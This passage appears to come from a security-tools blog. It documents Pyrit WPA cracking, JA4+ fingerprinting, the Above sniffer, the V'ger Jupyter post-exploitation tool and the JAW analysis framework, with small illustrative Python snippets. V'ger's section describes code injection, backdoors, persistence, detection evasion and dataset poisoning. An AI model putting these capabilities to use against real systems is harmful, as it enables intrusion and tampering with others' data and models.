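def compute_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

pmk = compute_pmk("password", "linksys")
```

Because the salt is the SSID rather than anything per-session, PMKs can be precomputed per network name, which is exactly the space-time trade-off Pyrit exploits.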

        These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

        • A single storage (e.g. a MySQL-server)
        • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
        • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computational nodes, two of which actually access the RPC-interface.

        What's new

        • Fixed #479 and #481
        • Pyrit CUDA now compiles in OSX with Toolkit 7.5
        • Added use_CUDA and use_OpenCL in config file
        • Improved cores listing and managing
        • limit_ncpus now disables all CPUs when set to value <= 0
        • Improve CCMP packet identification, thanks to yannayl

        See CHANGELOG file for a better description.

        How to use

        Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

        How to participate

        You may want to read this wiki-entry if interested in porting Pyrit to a new hardware platform. For contributions or bug reports, submit an issue at https://github.com/JPaulMora/Pyrit/issues.



        JA4+ - Suite Of Network Fingerprinting Standards

        By: Zion3R


        JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

        Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
        JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
        JA4T: TCP Fingerprinting (JA4T/TS/TScan)


        To understand how to read JA4+ fingerprints, see Technical Details

        This repo includes JA4+ in Python, Rust, Zeek and C, as a Wireshark plugin.

        JA4/JA4+ support is being added to:
        GreyNoise
        Hunt
        Driftnet
        DarkSail
        Arkime
        GoLang (JA4X)
        Suricata
        Wireshark
        Zeek
        nzyme
        Netresec's CapLoader
        Netresec's NetworkMiner
        NGINX
        F5 BIG-IP
        nfdump
        ntop's ntopng
        ntop's nDPI
        Team Cymru
        NetQuest
        Censys
        Exploit.org's Netryx
        Cloudflare (cloudflare.com/bots/concepts/ja3-ja4-fingerprint/)
        fastly
        with more to be announced...

        Examples

        Application JA4+ Fingerprints
        Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
        JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
        JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
        JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
        IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
        IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
        JA4S=t120300_c030_5e2616a54c73
        Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
        JA4S=t130200_1301_a56c5b993250
        JA4X=000000000000_4f24da86fad6_bf0f0589fc03
        JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
        Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
        JA4X=2166164053c1_2166164053c1_30d204a01551
        SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
        JA4S=t130200_1302_a56c5b993250
        JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
        Qakbot JA4X=2bab15409345_af684594efb4_000000000000
        Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
        Darkgate JA4H=po10nn060000_cdb958d032b0
        LummaC2 JA4H=po11nn050000_d253db9d024b
        Evilginx JA4=t13d191000_9dc949149365_e7c285222651
        Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
        Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
        Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

        For more, see ja4plus-mapping.csv
        The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

        Plugins

        Wireshark
        Zeek
        Arkime

        Binaries

        Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

        Download the latest JA4 binaries from: Releases.

        JA4+ on Ubuntu

        sudo apt install tshark
        ./ja4 [options] [pcap]

        JA4+ on Mac

        1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

        ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
        ./ja4 [options] [pcap]

        JA4+ on Windows

        1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
        tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
        2) Add the location of tshark to your "PATH" environment variable in Windows.
        (System properties > Environment Variables... > Edit Path)
        3) Open cmd, navigate the ja4 folder

        ja4 [options] [pcap]

        Database

        An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

        In the meantime, see ja4plus-mapping.csv

        Feel free to do a pull request with any JA4+ data you find.

        JA4+ Details

        JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

        All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

        For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints, but with JA4 only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
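        The a_b_c format makes this kind of analysis trivial to express; a minimal sketch of joining the a and c parts while dropping b (the fingerprint value is taken from the Chrome example above; the function name is ours):

```python
def ja4_ac(fingerprint: str) -> str:
    """Drop the middle (b) section of an a_b_c JA4 fingerprint,
    keeping the a and c parts for actor tracking."""
    a, b, c = fingerprint.split("_")
    return f"{a}_{c}"

ja4_ac("t13d1516h2_8daaf6152771_02713d6af862")  # "t13d1516h2_02713d6af862"
```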

        Current methods and implementation details:
        | Full Name | Short Name | Description |
        |---|---|---|
        | JA4 | JA4 | TLS Client Fingerprinting |
        | JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
        | JA4HTTP | JA4H | HTTP Client Fingerprinting |
        | JA4Latency | JA4L | Latency Measurement / Light Distance |
        | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
        | JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
        | JA4TCP | JA4T | TCP Client Fingerprinting |
        | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
        | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

        The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

        To understand how to read JA4+ fingerprints, see Technical Details

        Licensing

        JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

        JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

        All JA4+ methods are patent pending.
        JA4+ is a trademark of FoxIO

        JA4+ can and is being implemented into open source tools, see the License FAQ for details.

        This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

        ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

        Q&A

        Q: Why are you sorting the ciphers? Doesn't the ordering matter?
        A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
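        A sketch of why sorting defeats cipher stunting, assuming the JA4 convention of hashing the sorted cipher list with SHA-256 truncated to 12 hex characters (the helper name and sample values are illustrative):

```python
import hashlib

def cipher_hash(ciphers: list[str]) -> str:
    """Sort the cipher hex codes, join with commas, and take the
    first 12 hex characters of the SHA-256 digest."""
    joined = ",".join(sorted(ciphers))
    return hashlib.sha256(joined.encode()).hexdigest()[:12]

# reordering the list no longer changes the fingerprint section
h = cipher_hash(["1302", "1301", "1303"])
same = h == cipher_hash(["1303", "1301", "1302"])
```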

        Q: Why are you sorting the extensions?
        A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

        So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

        Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
        A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

        JA4+ was created by:

        John Althouse, with feedback from:

        Josh Atkins
        Jeff Atkinson
        Joshua Alexander
        W.
        Joe Martin
        Ben Higgins
        Andrew Morris
        Chris Ueland
        Ben Schofield
        Matthias Vallentin
        Valeriy Vorotyntsev
        Timothy Noel
        Gary Lipsky
        And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

        Contact John Althouse at john@foxio.io for licensing and questions.

        Copyright (c) 2024, FoxIO



        Above - Invisible Network Protocol Sniffer

        By: Zion3R


        Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


        Above: Invisible network protocol sniffer
        Designed for pentesters and security engineers

        Author: Magama Bazarov, <caster@exploit.org>
        Pseudonym: Caster
        Version: 2.6
        Codename: Introvert

        Disclaimer

        All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

        It is a specialized network security tool that helps both pentesters and security professionals.

        Mechanics

        Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it makes no noise on the air; that is what makes it invisible. It is built entirely on the Scapy library.

        Above allows pentesters to automate the process of finding vulnerabilities in network hardware: discovery protocols, dynamic routing, 802.1Q, ICS protocols, FHRP, STP, LLMNR/NBT-NS, etc.

        Supported protocols

        Detects up to 27 protocols:

        MACSec (802.1X AE)
        EAPOL (Checking 802.1X versions)
        ARP (Passive ARP, Host Discovery)
        CDP (Cisco Discovery Protocol)
        DTP (Dynamic Trunking Protocol)
        LLDP (Link Layer Discovery Protocol)
        802.1Q Tags (VLAN)
        S7COMM (Siemens)
        OMRON
        TACACS+ (Terminal Access Controller Access Control System Plus)
        ModbusTCP
        STP (Spanning Tree Protocol)
        OSPF (Open Shortest Path First)
        EIGRP (Enhanced Interior Gateway Routing Protocol)
        BGP (Border Gateway Protocol)
        VRRP (Virtual Router Redundancy Protocol)
        HSRP (Hot Standby Router Protocol)
        GLBP (Gateway Load Balancing Protocol)
        IGMP (Internet Group Management Protocol)
        LLMNR (Link Local Multicast Name Resolution)
        NBT-NS (NetBIOS Name Service)
        MDNS (Multicast DNS)
        DHCP (Dynamic Host Configuration Protocol)
        DHCPv6 (Dynamic Host Configuration Protocol v6)
        ICMPv6 (Internet Control Message Protocol v6)
        SSDP (Simple Service Discovery Protocol)
        MNDP (MikroTik Neighbor Discovery Protocol)

        Operating Mechanism

        Above works in two modes:

        • Hot mode: Sniffing on your interface specifying a timer
        • Cold mode: Analyzing traffic dumps

        The tool is very simple in its operation and is driven by arguments:

        • Interface: Specifying the network interface on which sniffing will be performed
        • Timer: Time during which traffic analysis will be performed
        • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
        • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
        • Passive ARP: Detecting hosts in a segment using Passive ARP

        usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

        options:
        -h, --help show this help message and exit
        --interface INTERFACE
        Interface for traffic listening
        --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
        --output OUTPUT File name where the traffic will be recorded
        --input INPUT File name of the traffic dump
        --passive-arp Passive ARP (Host Discovery)
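        The passive ARP detection described above amounts to filtering for ARP replies (opcode 2) and recording the sender fields; a minimal illustration on a hand-built frame (Above itself uses Scapy; the function name and addresses are ours):

```python
import struct
import socket

def parse_arp_reply(frame: bytes):
    """Extract sender MAC and IP from an Ethernet ARP frame;
    return None unless it is an ARP reply (opcode 2)."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":  # EtherType must be ARP
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    if opcode != 2:  # only replies reveal a live host passively
        return None
    sender_mac = frame[22:28].hex(":")
    sender_ip = socket.inet_ntoa(frame[28:32])
    return sender_mac, sender_ip

# craft a minimal ARP reply frame for illustration
frame = (b"\xff" * 6                                  # destination MAC
         + b"\x00\x0c\x29\xc5\x82\x81"                # source MAC
         + b"\x08\x06"                                # EtherType: ARP
         + b"\x00\x01\x08\x00\x06\x04\x00\x02"        # ARP header, opcode 2
         + b"\x00\x0c\x29\xc5\x82\x81"                # sender MAC
         + socket.inet_aton("192.168.1.40")           # sender IP
         + b"\x00" * 6                                # target MAC
         + socket.inet_aton("192.168.1.1"))           # target IP
```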

        Information about protocols

        The information obtained will be useful not only to the pentester, but also to the security engineer, who will know what to pay attention to.

        When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

        • Impact: What kind of attack can be performed on this protocol;

        • Tools: What tool can be used to launch an attack;

        • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

        • Mitigation: Recommendations for fixing the security problems

        • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


        Installation

        Linux

        You can install Above directly from the Kali Linux repositories

        caster@kali:~$ sudo apt update && sudo apt install above

        Or...

        caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
        caster@kali:~$ git clone https://github.com/casterbyte/Above
        caster@kali:~$ cd Above/
        caster@kali:~/Above$ sudo python3 setup.py install

        macOS:

        # Install python3 first
        brew install python3
        # Then install required dependencies
        sudo pip3 install scapy colorama setuptools

        # Clone the repo
        git clone https://github.com/casterbyte/Above
        cd Above/
        sudo python3 setup.py install

        Don't forget to deactivate your firewall on macOS!

        Settings > Network > Firewall


        How to Use

        Hot mode

        Above requires root access for sniffing

        Above can be run with or without a timer:

        caster@kali:~$ sudo above --interface eth0 --timer 120

        To stop traffic sniffing, press CTRL + C

        WARNING! Above is not designed to work with tunnel (L3) interfaces due to its use of filters for L2 protocols, and may not work properly on them.

        Example:

        caster@kali:~$ sudo above --interface eth0 --timer 120

        -----------------------------------------------------------------------------------------
        [+] Start sniffing...

        [*] After the protocol is detected - all necessary information about it will be displayed
        --------------------------------------------------
        [+] Detected SSDP Packet
        [*] Attack Impact: Potential for UPnP Device Exploitation
        [*] Tools: evil-ssdp
        [*] SSDP Source IP: 192.168.0.251
        [*] SSDP Source MAC: 02:10:de:64:f2:34
        [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
        --------------------------------------------------
        [+] Detected MDNS Packet
        [*] Attack Impact: MDNS Spoofing, Credentials Interception
        [*] Tools: Responder
        [*] MDNS Spoofing works specifically against Windows machines
        [*] You cannot get NetNTLMv2-SSP from Apple devices
        [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
        [*] MDNS Speaker MAC: 02:10:de:64:f2:34
        [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
        --------------------------------------------------

        If you need to record the sniffed traffic, use the --output argument

        caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

        If you interrupt the tool with CTRL+C, the traffic is still written to the file

        Cold mode

        If you already have some recorded traffic, you can use the --input argument to look for potential security issues

        caster@kali:~$ above --input ospf-md5.cap

        Example:

        caster@kali:~$ sudo above --input ospf-md5.cap

        [+] Analyzing pcap file...

        --------------------------------------------------
        [+] Detected OSPF Packet
        [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
        [*] Tools: Loki, Scapy, FRRouting
        [*] OSPF Area ID: 0.0.0.0
        [*] OSPF Neighbor IP: 10.0.0.1
        [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
        [!] Authentication: MD5
        [*] Tools for bruteforce: Ettercap, John the Ripper
        [*] OSPF Key ID: 1
        [*] Mitigation: Enable passive interfaces, use authentication
        --------------------------------------------------
        [+] Detected OSPF Packet
        [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
        [*] Tools: Loki, Scapy, FRRouting
        [*] OSPF Area ID: 0.0.0.0
        [*] OSPF Neighbor IP: 192.168.0.2
        [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
        [!] Authentication: MD5
        [*] Tools for bruteforce: Ettercap, John the Ripper
        [*] OSPF Key ID: 1
        [*] Mitigation: Enable passive interfaces, use authentication

        Passive ARP

        The tool can detect hosts without noise in the air by processing ARP frames in passive mode

        caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

        [+] Host discovery using Passive ARP

        --------------------------------------------------
        [+] Detected ARP Reply
        [*] ARP Reply for IP: 192.168.1.88
        [*] MAC Address: 00:00:0c:07:ac:c8
        --------------------------------------------------
        [+] Detected ARP Reply
        [*] ARP Reply for IP: 192.168.1.40
        [*] MAC Address: 00:0c:29:c5:82:81
        --------------------------------------------------

        Outro

        I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




        Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

        By: Zion3R

        V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

        User Stories

        • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
        • As a Red Teamer, you know that some browser-based actions will be visible to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
        • As an AI Red Teamer, you understand academic algorithmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. With V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
        • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

        Usage

        Initial Setup

        1. pip install vger
        2. vger --help

        Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

        Commands

        Once a connection is established, users drop into a nested set of menus.

        The top level menu is:

        • Reset: Configure a different host.
        • Enumerate: Utilities to learn more about the host.
        • Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
        • Persist: Utilities to establish persistence mechanisms.
        • Export: Save output to a text file.
        • Quit: No one likes quitters.

        These menus contain the following functionality:

        • List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
        • Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
        • Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
        • Check History: See ipython commands recently run in the target notebook.
        • Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
        • List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
        • Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
        • Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
        • Find models: Find models based on common file formats.
        • Download models: Download discovered models.
        • Snoop: Monitor notebook execution and results until timeout.
        • Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
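        Under the hood, interacting with an authenticated Jupyter server boils down to REST calls carrying the token. A minimal sketch of building such a request (endpoint paths are from the Jupyter Server REST API; this is not V'ger's code, and the host/token values are placeholders):

```python
def jupyter_request(host: str, token: str, endpoint: str) -> tuple[str, dict]:
    """Build the URL and Authorization header for an authenticated
    Jupyter Server REST API call (e.g. /api/sessions, /api/contents)."""
    url = f"{host.rstrip('/')}{endpoint}"
    headers = {"Authorization": f"token {token}"}
    return url, headers

url, headers = jupyter_request("http://10.0.0.5:8888", "abc123", "/api/sessions")
```

A GET on /api/sessions with that header lists running notebooks and their kernels, which is the starting point for the enumeration modules above.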

        Experimental

        With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant as rough translations to help non-DS/AI folks quickly triage whether (or which) notebooks are worth investigating further.

        There is an inherent tradeoff between model size and ability, and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt-injecting their notebooks ("these are not the droids you're looking for").

        Examples



        JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

        By: Zion3R

        An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

        This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

        JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

        Release Notes:


        Overview of JAW

        The architecture of the JAW is shown below.

        Test Inputs

        JAW can be used in two distinct ways:

        1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

        2. Web Application Analysis: Analyze a web application by providing a single seed URL.

        Data Collection

        • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

        HPG Construction

        • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

        • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).
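        As a rough illustration of what such a semantic-type mapping could look like, here is a sketch in Python. The type names and token lists below are illustrative assumptions for this example, not JAW's actual vocabulary or file format.

```python
# Hypothetical mapping from semantic types to custom JavaScript language
# tokens, as might be supplied to the HPG construction module. All names
# here are invented for illustration.
SEMANTIC_TYPES = {
    "REQ": ["fetch", "XMLHttpRequest", "$.ajax"],        # HTTP request functions
    "STORAGE": ["localStorage.setItem", "sessionStorage.setItem"],
    "DOM_WRITE": ["document.write", "innerHTML"],
}

def tag_token(token: str) -> list:
    """Return the semantic types whose token list contains `token`."""
    return [t for t, tokens in SEMANTIC_TYPES.items() if token in tokens]
```

A categorization step could then label each call site whose callee matches a token, e.g. tag_token("fetch") yields the request category in this sketch.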

        Analysis and Outputs

        • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

        • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

        • The outputs will be stored in the same folder as that of input.

        Setup

        The installation script relies on the following prerequisites:

        • Latest version of the npm package manager (Node.js)
        • Any stable version of Python 3.x
        • The Python pip package manager

        Afterwards, install the necessary dependencies via:

        $ ./install.sh

        For detailed installation instructions, please see here.

        Quick Start

        Running the Pipeline

        You can run an instance of the pipeline in a background screen via:

        $ python3 -m run_pipeline --conf=config.yaml

        The CLI provides the following options:

        $ python3 -m run_pipeline -h

        usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

        This script runs the tool pipeline.

        optional arguments:
        -h, --help show this help message and exit
        --conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
        --site SITE, -S SITE website to test; overrides config file (default: None)
        --list LIST, -L LIST site list to test; overrides config file (default: None)
        --from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
        --to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

        Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

        Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

        Quick Example

        For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

        $ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

        Crawling and Data Collection

        This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.

        JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

        Playwright CLI with Foxhound

        This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

        $ cd crawler
        $ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

        The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

        Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

        Puppeteer CLI

        To start the crawler, do:

        $ cd crawler
        $ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

        See here for more information.

        Selenium CLI

        To start the crawler, do:

        $ cd crawler/hpg_crawler
        $ vim docker-compose.yaml # set the websites you want to crawl here and save
        $ docker-compose build
        $ docker-compose up -d

        Please refer to the documentation of the hpg_crawler here for more information.

        Graph Construction

        HPG Construction CLI

        To generate an HPG for a given (set of) JavaScript file(s), do:

        $ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

        optional arguments:
        --lang: language of the input program
        --graphid: an identifier for the generated HPG
        --input: path of the input program(s)
        --output: path of the output HPG, must be i
        --mode: determines the output format (csv or graphML)

        HPG Import CLI

        To import an HPG inside a neo4j graph database (docker instance), do:

        $ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
        $ python3 -m hpg_neo4j.hpg_import -h

        usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

        This script imports a CSV of a property graph into a neo4j docker database.

        optional arguments:
        -h, --help show this help message and exit
        --rpath P relative path to the folder containing the graph CSV files inside the `data` directory
        --id I an identifier for the graph or docker container
        --nodes N the name of the nodes csv file (default: nodes.csv)
        --edges E the name of the relations csv file (default: rels.csv)

        HPG Construction and Import CLI (v1)

        In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

        $ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

        Specification of Parameters:

        • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
        • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
        • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
        • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
        • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false to exclude (default: request_logs_short.out).
        • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
        • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
        • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

        For more information, you can use the help CLI provided with the graph construction API:

        $ python3 -m engine.api -h

        Security Analysis

        The constructed HPG can then be queried using Cypher or the NeoModel ORM.

        Running Custom Graph traversals

        You should place and run your queries in analyses/<ANALYSIS_NAME>.

        Option 1: Using the NeoModel ORM (Deprecated)

        You can use the NeoModel ORM to query the HPG. To write a query:

        • (1) Check out the HPG data model and syntax tree.
        • (2) Check out the ORM model for HPGs
        • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
        $ python3 -m analyses.example.example_query_orm  

        For more information, please see here.

        Option 2: Using Cypher Queries

        You can use Cypher to write custom queries. For this:

        • (1) Check out the HPG data model and syntax tree.
        • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
        $ python3 -m analyses.example.example_query_cypher

        For more information, please see here.
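        To give a flavor of what such a custom query might look like, here is a minimal sketch that builds a Cypher-style data-flow traversal as a string. The node label and relationship name (ASTNode, PDG_REACHES) are assumptions for illustration, not necessarily JAW's actual HPG schema.

```python
# Sketch: construct a Cypher query for a simple data-flow reachability
# traversal. Labels and relationship types are hypothetical.
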